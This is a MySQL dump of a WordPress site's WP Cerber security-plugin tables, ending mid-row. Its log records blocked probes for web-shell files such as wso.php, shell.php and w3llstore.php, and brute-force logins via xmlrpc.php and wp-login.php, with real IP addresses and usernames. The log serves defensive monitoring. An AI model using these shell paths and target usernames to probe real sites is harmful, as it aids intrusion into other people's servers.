-- MySQL dump 10.19  Distrib 10.3.36-MariaDB, for Linux (x86_64)
--
-- Host: localhost    Database: cteisys_wp485
-- ------------------------------------------------------
-- Server version	10.3.36-MariaDB-log

/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;

--
-- Table structure for table `cerber_acl`
--

DROP TABLE IF EXISTS `cerber_acl`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_acl` (
  `ip` varchar(81) CHARACTER SET ascii NOT NULL,
  `ip_long_begin` bigint(20) unsigned NOT NULL DEFAULT 0,
  `ip_long_end` bigint(20) unsigned NOT NULL DEFAULT 0,
  `tag` char(1) NOT NULL,
  `comments` varchar(250) NOT NULL,
  `acl_slice` smallint(5) unsigned NOT NULL DEFAULT 0,
  `ver6` smallint(5) unsigned NOT NULL DEFAULT 0,
  `v6range` varchar(255) CHARACTER SET ascii NOT NULL DEFAULT '',
  `req_uri` varchar(255) CHARACTER SET ascii NOT NULL DEFAULT '',
  KEY `main_for_selects` (`acl_slice`,`ver6`,`ip_long_begin`,`ip_long_end`,`tag`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `cerber_acl`
--

LOCK TABLES `cerber_acl` WRITE;
/*!40000 ALTER TABLE `cerber_acl` DISABLE KEYS */;
INSERT INTO `cerber_acl` VALUES ('130.44.228.161',2183980193,2183980193,'W','My IP address (August 23, 2022, 12:27 am)',0,0,'','');
/*!40000 ALTER TABLE `cerber_acl` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `cerber_blocks`
--

DROP TABLE IF EXISTS `cerber_blocks`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_blocks` (
  `ip` varchar(39) CHARACTER SET ascii NOT NULL,
  `block_until` bigint(20) unsigned NOT NULL,
  `reason` varchar(250) NOT NULL,
  `reason_id` int(11) unsigned NOT NULL DEFAULT 0,
  UNIQUE KEY `ip` (`ip`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `cerber_blocks`
--

LOCK TABLES `cerber_blocks` WRITE;
/*!40000 ALTER TABLE `cerber_blocks` DISABLE KEYS */;
/*!40000 ALTER TABLE `cerber_blocks` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `cerber_countries`
--

DROP TABLE IF EXISTS `cerber_countries`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_countries` (
  `country` char(3) NOT NULL DEFAULT '' COMMENT 'Country code',
  `locale` char(10) NOT NULL DEFAULT '' COMMENT 'Locale i18n',
  `country_name` varchar(250) NOT NULL DEFAULT '',
  PRIMARY KEY (`country`,`locale`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `cerber_countries`
--

LOCK TABLES `cerber_countries` WRITE;
/*!40000 ALTER TABLE `cerber_countries` DISABLE KEYS */;
/*!40000 ALTER TABLE `cerber_countries` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `cerber_lab`
--

DROP TABLE IF EXISTS `cerber_lab`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_lab` (
  `ip` varchar(39) CHARACTER SET ascii NOT NULL,
  `reason_id` int(11) unsigned NOT NULL DEFAULT 0,
  `stamp` bigint(20) unsigned NOT NULL,
  `details` text NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `cerber_lab`
--

LOCK TABLES `cerber_lab` WRITE;
/*!40000 ALTER TABLE `cerber_lab` DISABLE KEYS */;
/*!40000 ALTER TABLE `cerber_lab` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `cerber_lab_ip`
--

DROP TABLE IF EXISTS `cerber_lab_ip`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_lab_ip` (
  `ip` varchar(39) CHARACTER SET ascii NOT NULL,
  `reputation` int(11) unsigned NOT NULL,
  `expires` int(11) unsigned NOT NULL,
  PRIMARY KEY (`ip`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `cerber_lab_ip`
--

LOCK TABLES `cerber_lab_ip` WRITE;
/*!40000 ALTER TABLE `cerber_lab_ip` DISABLE KEYS */;
/*!40000 ALTER TABLE `cerber_lab_ip` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `cerber_lab_net`
--

DROP TABLE IF EXISTS `cerber_lab_net`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_lab_net` (
  `ip` varchar(39) CHARACTER SET ascii NOT NULL DEFAULT '',
  `ip_long_begin` bigint(20) unsigned NOT NULL DEFAULT 0,
  `ip_long_end` bigint(20) unsigned NOT NULL DEFAULT 0,
  `country` char(3) CHARACTER SET ascii NOT NULL DEFAULT '',
  `expires` int(11) unsigned NOT NULL DEFAULT 0,
  PRIMARY KEY (`ip`),
  UNIQUE KEY `begin_end` (`ip_long_begin`,`ip_long_end`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `cerber_lab_net`
--

LOCK TABLES `cerber_lab_net` WRITE;
/*!40000 ALTER TABLE `cerber_lab_net` DISABLE KEYS */;
/*!40000 ALTER TABLE `cerber_lab_net` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `cerber_log`
--

DROP TABLE IF EXISTS `cerber_log`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_log` (
  `ip` varchar(39) CHARACTER SET ascii NOT NULL,
  `ip_long` bigint(20) unsigned NOT NULL DEFAULT 0,
  `user_login` varchar(60) NOT NULL,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `stamp` decimal(14,4) NOT NULL,
  `activity` int(10) unsigned NOT NULL DEFAULT 0,
  `session_id` char(32) CHARACTER SET ascii NOT NULL DEFAULT '',
  `country` char(3) CHARACTER SET ascii NOT NULL DEFAULT '',
  `details` varchar(250) CHARACTER SET ascii NOT NULL DEFAULT '',
  `ac_bot` int(10) unsigned NOT NULL DEFAULT 0,
  `ac_status` int(10) unsigned NOT NULL DEFAULT 0,
  `ac_by_user` bigint(20) unsigned NOT NULL DEFAULT 0,
  KEY `ip` (`ip`),
  KEY `ip_long` (`ip_long`),
  KEY `session_index` (`session_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `cerber_log`
--

LOCK TABLES `cerber_log` WRITE;
/*!40000 ALTER TABLE `cerber_log` DISABLE KEYS */;
INSERT INTO `cerber_log` VALUES ('152.89.196.13',2556019725,'',0,1663810707.0081,55,'PpF0xt1IuekvHb3D6qg7JX4o','','19|0|0|0|cteisys.com/wp-admin/accesson.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841662.2815,55,'HymYSJXnb6Bh3WZz8IikUT79','','19|0|0|0|cteisys.com/wp-includes/css/wp-activate.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841661.5025,55,'RpriG34zcvI7LHqj1OdgZyou','','19|0|0|0|cteisys.com/wp-includes/css/olux.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841660.7209,55,'KIj5NxcBSH2XkDVY3istWP7h','','19|0|0|0|cteisys.com/wp-includes/css/wp-email.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841659.9034,55,'U97VgykZhvL268NQrRjbK3iF','','19|0|0|0|cteisys.com/wp-includes/css/w3llstore.php',0,19,0),('95.217.184.77',1608104013,'',0,1663816912.6495,55,'6fHOtnrMwcKldsJ4F2hokvD8','','19|0|0|0|cteisys.com/wp-includes/shell20211028.php',0,19,0),('95.217.184.77',1608104013,'',0,1663816908.2632,55,'jTtnmih2HWdKX4G7DzFx0lwO','','19|0|0|0|cteisys.com/wp-includes/shell20211028.php',0,19,0),('95.217.184.77',1608104013,'',0,1663816903.6516,55,'wJDWATPILm2rXHsi6E7ulQce','','19|0|0|0|cteisys.com/wp-content/themes/seotheme/mar.php',0,19,0),('95.217.184.77',1608104013,'',0,1663816900.6016,55,'9V8eD6w3SZPCLrTEXhRBQvHb','','19|0|0|0|cteisys.com/wp-content/themes/seotheme/mar.php',0,19,0),('103.226.251.11',1742928651,'admin1',0,1663816210.9539,51,'wOrvbFUqDE7SdtKe51TXf2ki','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.226.251.11',1742928651,'newd',0,1663816208.0694,7,'c0hSjxdNXK6ArRzgYsy7o1pn','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('132.145.39.16',2224105232,'',0,1663841659.0907,55,'yti0kqXD1HZJKAYml7w8FOWU','','19|0|0|0|cteisys.com/wp-includes/css/wso2.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841658.2335,55,'KLt6uFXU4rNqhECT39iPw0sV','','19|0|0|0|cteisys.com/wp-includes/css/wso.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841657.3853,55,'J5ftpzFnZdHKkyPbxc1M8INU','','19|0|0|0|cteisys.com/wp-includes/css/wp-ver.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841656.6053,55,'hEMqaPS8wK21tgsVnIrAQyjF','','19|0|0|0|cteisys.com/wp-includes/css/wp-class.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841655.8353,55,'abfqwvPc4nxihDs9e5dCUY1t','','19|0|0|0|cteisys.com/wp-includesmini.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841655.0506,55,'WiTBRlbSf3y02rDhuZVdePxm','','19|0|0|0|cteisys.com/wp-includes/shell.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841654.2099,55,'nHiRyBfLJu6grXkSwsl2Q7WF','','19|0|0|0|cteisys.com/wp-includes/wp-activate.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841653.4056,55,'2MIfR3UtuO1XVKmJZlGSyePA','','19|0|0|0|cteisys.com/wp-includes/olux.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841652.6041,55,'a06gWhvezlTHw74mAdCLDRnX','','19|0|0|0|cteisys.com/wp-includes/wp-email.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841651.8219,55,'9goC5wNDBahufpQvAcMW3RjO','','19|0|0|0|cteisys.com/wp-includes/w3llstore.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841651.0372,55,'vS26iApWg93JotUlMOLmuYTK','','19|0|0|0|cteisys.com/wp-includes/wso2.php',0,19,0),('107.180.103.185',1806985145,'admin',0,1663841640.9824,152,'w2ZPLlcmMxDokHRTAnjXWUqG','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('203.118.155.133',3413547909,'newd',0,1663826103.0413,152,'59rN17RXeJMsIdCxvQy2nLmk','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.46.253',3515690749,'Joyce',0,1663825884.6769,51,'f1lR0AUiSd7BJE9hqHNyoGKL','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('114.132.201.19',1921304851,'newd',0,1663825768.4775,152,'r5nzeApbasOGIuk3S4Rcx60J','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('161.97.100.231',2707514599,'newd',0,1663825696.8817,152,'3PIH8W4ia9shlKpr5XNBRVwb','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('41.93.82.7',693981703,'newd',0,1663825321.5475,152,'fCnLvc4KYBVRZTqxw3SQUkDH','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('64.42.179.43',1076540203,'joyce',0,1663820216.9872,152,'jghlJ3UZd4FyumXI1bD8QeGE','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('46.183.216.163',783800483,'joyce',0,1663819343.6599,152,'7xlARInaZsvW1Jg6it85o3cM','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('130.61.143.194',2185072578,'newd',0,1663825224.0210,152,'uV4GgfEPIp2zCNi9615wrksq','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('62.90.101.113',1046111601,'newd',0,1663824862.3205,152,'lUAOtMivTGNko8sR7xKyYaQW','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('139.196.152.3',2344916995,'newd',0,1663824369.9360,152,'axVwhvKILuDfCJ0NmkO1gbEM','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('93.113.111.193',1567715265,'newd',0,1663824289.6345,152,'BUkzyC3dPRpKriomejHJAx6w','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('37.46.128.180',623804596,'newd',0,1663823905.1616,152,'wOtC80dDAUQ3rFc6JqZmk4Vn','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.241.120.248',2733734136,'admin',0,1663823410.2978,152,'M1zcEZA9xkYWso7ndFwNlOe3','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.215.217.77',2732054861,'admin',0,1663822931.7655,152,'NSzos7vwU4gr5QdLG86qJtIM','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('37.120.210.219',628675291,'joyce',0,1663822907.3048,152,'SJyd4EwAo6l7RtXu8f39LVqz','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('119.18.54.14',1997682190,'admin',0,1663822861.6303,152,'w6CuBWFXZ3lsAY2gopebLfEN','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('132.145.39.16',2224105232,'',0,1663841639.5267,55,'tvz6SWOsU89NJXwkpBDCGLKh','','19|0|0|0|cteisys.com/wp-content/wp-class.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841638.1990,55,'pXQSNMD2kYFr80WPw9liR6ZV','','19|0|0|0|cteisys.com/wp-adminmini.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841636.9786,55,'BYay9DjlXhMoJZEI1m0Qku2p','','19|0|0|0|cteisys.com/wp-admin/shell.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841636.2135,55,'PN0Bq9Ae84wGmRCEiuXQbtz2','','19|0|0|0|cteisys.com/wp-admin/wp-activate.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841635.2879,55,'OouYpWVrfZ0UyqBl1tIJNTQv','','19|0|0|0|cteisys.com/wp-admin/olux.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841634.4515,55,'s85Sv72kYAtWraQhXezCTq0V','','19|0|0|0|cteisys.com/wp-admin/wp-email.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841633.6754,55,'9Lx0YsVlH87Oq6JoGvf3WEDk','','19|0|0|0|cteisys.com/wp-admin/w3llstore.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841632.8729,55,'6MexPIp5Z7gjEz9hk0FLlbBA','','19|0|0|0|cteisys.com/wp-admin/wso2.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841632.0771,55,'lBszeMLPGEoDpCh5tJ1O6FSa','','19|0|0|0|cteisys.com/wp-admin/wso.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841631.2401,55,'NIAFnROEjBKT4buqfVwgsUMk','','19|0|0|0|cteisys.com/wp-admin/wp-ver.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841630.4182,55,'gzbtP18JMcLlOSxeHIYviprC','','19|0|0|0|cteisys.com/wp-admin/wp-class.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841629.6178,55,'CkrEJfiDdBwZG3j9Y5v8OQ1H','','19|0|0|0|cteisys.com/mini.php',0,19,0),('152.89.196.13',2556019725,'',0,1663829950.7459,55,'bXBhoaTz7f2mFHWsAMRSvQik','','19|0|0|0|cteisys.com/wp-temp-ali.php',0,19,0),('67.205.143.236',1137545196,'newd',0,1663829913.4359,152,'X46LV0A73QdkOzo5bpNiqSyR','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('124.158.12.149',2090732693,'newd',0,1663829565.6921,152,'eNRUI0C3fw8rQOxayYB9kVAi','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('151.106.35.235',2540315627,'newd',0,1663829493.9077,152,'jBI9756lm1fUrXvPzYE0ykLT','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('81.68.87.46',1363433262,'newd',0,1663829153.2978,152,'8Fz1ZqR3cO6LGflyXYjd0mpH','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('192.210.196.65',3235038273,'newd',0,1663828662.4762,152,'wo60XG2UjW1DqvOZB4VmncbI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('35.211.94.153',601054873,'newd',0,1663828321.4497,152,'Y7qy93bvhOUEJXWmBDVoIAQT','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.144.49.214',2727358934,'newd',0,1663828261.5155,152,'GIqrnUTLKWFeADiBoSCYMvNf','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('97.79.239.127',1632628607,'newd',0,1663827905.3647,152,'DUxtgHZASIQXEFKcL1e9bplG','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('128.199.60.194',2160540866,'newd',0,1663827819.0962,152,'G6YpMvh1oKP2wuctFLjxWVHl','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('8.210.102.36',148006436,'newd',0,1663827388.5371,152,'IDc08ZHqFQCVT4zMi5AEwdRj','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.121.90.150',1736006294,'newd',0,1663827053.1144,152,'LGb1jy6qDzUl9MAJuYpfQNix','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('144.126.140.17',2424212497,'newd',0,1663826976.9782,152,'OHjYGIPvxySD3FKlBguE15t9','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('35.194.233.240',599976432,'newd',0,1663826617.2667,152,'TErQ3MyRiJKHXjmhSCNxftbq','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.104.44.128',3110612096,'newd',0,1663826547.7615,152,'OpWvkGE612o5LKaiAzh9lZPN','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('132.145.39.16',2224105232,'',0,1663841628.7860,55,'luPzWsLYJmMtXGVrOxeA5KaH','','19|0|0|0|cteisys.com//shell.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841627.8149,50,'9BVw6fCykigpKD403Qqu7SYo','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('132.145.39.16',2224105232,'',0,1663841621.5916,55,'CFdHv0GbKLI3xtyNV1Mu4SR8','','19|0|0|0|cteisys.com//olux.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841620.7590,55,'JKtnNVDm1Z0uWBTce2pgSR4O','','19|0|0|0|cteisys.com//wp-email.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841619.9668,10,'thOLlukvwbrSeHi3UP48MR05','','707|0|0|0|cteisys.com//w3llstore.php',0,707,0),('132.145.39.16',2224105232,'',0,1663841619.9636,55,'thOLlukvwbrSeHi3UP48MR05','','19|0|0|0|cteisys.com//w3llstore.php',0,19,0),('176.109.189.170',2959981994,'',0,1663833847.8089,55,'V3YlMNRjuGSUiHPDtCfK54zF','','19|0|0|0|cteisys.com/shell.php',0,19,0),('207.55.255.20',3476553492,'newd',0,1663833150.8867,152,'mbZpL5jqBHf71SMacu4wJU8d','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('47.106.201.134',795527558,'newd',0,1663832758.4086,152,'vb5Kx0mVcEyAFiau9qlzkY4U','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('128.199.108.205',2160553165,'newd',0,1663832656.9429,152,'VkrmAHLhpPjDBdFQE1JGsT8X','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.79.241.19',860877075,'newd',0,1663832280.1971,152,'gZfUmyxeHtPilQTE6bouO1Rr','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('35.213.170.208',601205456,'newd',0,1663832174.0370,152,'B6Fn54qiTztDHPcWgehjsvxy','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.241.120.248',2733734136,'newd',0,1663831336.3163,152,'TIi8wf7rJGkF5nvBtqAsCMZV','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('195.225.76.130',3286322306,'newd',0,1663831234.0042,152,'zxMgKpdP1lsN4GJwcREkemvA','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.90.232.106',1734010986,'newd',0,1663830769.6566,152,'coZi6TheJIpwPSFqyz8x7GR3','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('132.145.39.16',2224105232,'',0,1663841619.0905,55,'RHxShjvEsGkc0MTrp1tAzwIY','','19|0|0|0|cteisys.com//wso2.php',0,19,0),('152.89.196.13',2556019725,'',0,1663837032.6425,55,'tUZ1SPv6AwMGx5ikJCRH7Brs','','19|0|0|0|cteisys.com/wp-post.php',0,19,0),('51.79.241.19',860877075,'newd',0,1663836773.7882,152,'Ke83jQAlkcIZfuhS0b5FqwxU','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('5.101.157.235',90545643,'newd',0,1663836214.9672,152,'rWFHlaZnfwkGSsOV8EQByN34','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('125.227.127.195',2112061379,'newd',0,1663836074.3947,152,'7rW0eZljxcPDEQVHitndqBb6','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('139.59.228.23',2335958039,'newd',0,1663835713.4526,152,'Vv9z0b5Ws2FDMB63UOhnSjkr','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('128.199.134.216',2160559832,'newd',0,1663835302.0326,152,'YT0ehgLoE7N2KDzsfGmXrB1n','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('151.80.20.26',2538607642,'newd',0,1663834797.9403,152,'TuXZh6tFp52Wd3PDHrVSiCwf','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.233.89.214',3270072790,'newd',0,1663834676.6530,152,'DVay4bSqTzdh7iewWnQmgN0u','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('121.40.238.50',2032725554,'newd',0,1663834268.0102,152,'qTaOgK4eJYSsV2zu0RDxcB6C','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('132.145.39.16',2224105232,'',0,1663841618.2567,55,'ANeILc8PoFfilBWhst9qHn3j','','19|0|0|0|cteisys.com//wso.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841617.5155,55,'clyou0VFpX3qgdUWnNseJ7Zf','','19|0|0|0|cteisys.com//wp-ver.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841617.3361,55,'ZqhmVfiDTynJsLjIrM3APQCB','','19|0|0|0|cteisys.com//wp-class.php',0,19,0),('106.14.141.22',1779338518,'admin',0,1663840642.5517,152,'2HWapETC9hU83ndfwo0PKmGs','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.255.64.58',872366138,'admin',0,1663840542.8825,152,'T5DIMbutPLOBnRC7fYG6oxgX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('68.183.15.215',1152847831,'admin',0,1663839961.1897,152,'5JjAkSO0pxT1bIQR846VYBs3','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.145.54.181',3515954869,'admin',0,1663838416.1422,152,'ijPCm835rBsgWT7pKMzOltZu','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('150.95.112.79',2522837071,'admin',0,1663838277.8211,152,'YB59oXNnpyS6MsJb83j0CtqR','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('167.99.54.31',2808296991,'admin',0,1663837867.1483,152,'sHd1ctYXnoTwqbNKR28jACU3','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('116.62.49.96',1950232928,'admin',0,1663837730.8699,152,'I3B9FTVMDqPUyAfEiW8uGpYv','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('190.92.159.48',3193741104,'admin',0,1663837313.9954,152,'YftP5x0p2Lms9GriaTwMu8EN','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('132.145.39.16',2224105232,'',0,1663841650.2596,55,'qbFln0kMoI6HxCQRTA2iuLPG','','19|0|0|0|cteisys.com/wp-includes/wso.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841649.4506,55,'n94zfsoFNuHdElTawYcRGAxC','','19|0|0|0|cteisys.com/wp-includes/wp-ver.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841648.5957,55,'Zkrlo75Qs2h3PMODTSGmUv0J','','19|0|0|0|cteisys.com/wp-includes/wp-class.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841647.8121,55,'iQJwB9FtsKn2omWuAxZPjEbh','','19|0|0|0|cteisys.com/wp-contentmini.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841647.0740,55,'kCvYhQLt401HlygOnITBD2rV','','19|0|0|0|cteisys.com/wp-content/shell.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841646.3059,55,'6HMlnFXduWaNorhkygxzUS1t','','19|0|0|0|cteisys.com/wp-content/wp-activate.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841645.5236,55,'H6dhrCwLXxMi8pf5Ja1KWcgE','','19|0|0|0|cteisys.com/wp-content/olux.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841644.7596,55,'l9cHEvxBrTmV7Q4CAO3fIysM','','19|0|0|0|cteisys.com/wp-content/wp-email.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841643.9846,55,'ECrYm9yM7jqnXgVSDiZKtduw','','19|0|0|0|cteisys.com/wp-content/w3llstore.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841643.1055,55,'Plt2ZNeHjfkGDhQE1Up0IBd9','','19|0|0|0|cteisys.com/wp-content/wso2.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841642.2755,55,'A1tnVONI0387q6Rr9eys5xaU','','19|0|0|0|cteisys.com/wp-content/wso.php',0,19,0),('132.145.39.16',2224105232,'',0,1663841641.4017,55,'6i3gdKW1UTaMD7qn9EHOZX8B','','19|0|0|0|cteisys.com/wp-content/wp-ver.php',0,19,0),('51.159.105.232',866085352,'admin',0,1663846310.0427,152,'mCMJGAkdHt1UvleTSyI8Epqh','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('101.37.28.132',1696930948,'admin',0,1663845868.8695,152,'MGiLkU54SbQvDK2OYZB0A6lp','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.226.251.11',1742928651,'intos',0,1663845310.5316,51,'LEJ9cOy6egD5sSbqYTGwMQtC','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.226.251.11',1742928651,'newd',0,1663845308.1745,7,'gqLMf2XcSlis7Uzh6JbEINp8','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('152.89.196.13',2556019725,'',0,1663845305.8920,55,'UE1nGMYqhviuIQwjZ6XdcVFP','','19|0|0|0|cteisys.com/media-admin.php.php',0,19,0),('203.118.155.133',3413547909,'admin',0,1663845144.2726,152,'RKqBXIaHCnL1PiyjxA8FMYS6','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('107.167.244.83',1806169171,'joyce',0,1663845021.6159,152,'A1TtUSZnwxX2DFk04ReCKV58','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.8.26.65',1728584257,'admin',0,1663844717.5543,152,'06NHWvyIUhJk9FmzE3u7s8AK','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('85.31.46.140',1428106892,'',0,1663863907.3614,55,'54oQVB9vX0CGguRTHYfMlnka','','19|0|0|0|cteisys.com/style.php',0,19,0),('65.21.248.218',1091959002,'malivai',0,1663863848.5456,51,'cSsmKZLun1iy2Hjwkr7dWAOR','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('65.21.248.218',1091959002,'newd',0,1663863846.9582,7,'MN07TyItpDaBHqZGOx1PS28g','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('23.111.152.238',393189614,'testuser',0,1663863475.2710,51,'2xAboYuljvFT1qLIpwcCGKPQ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('23.111.152.238',393189614,'newd',0,1663863474.0589,7,'dPpGO3SKcWvxwHLa95BnMtVU','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('150.95.112.79',2522837071,'wwwadmin',0,1663849975.5267,51,'ZyIvSADsUp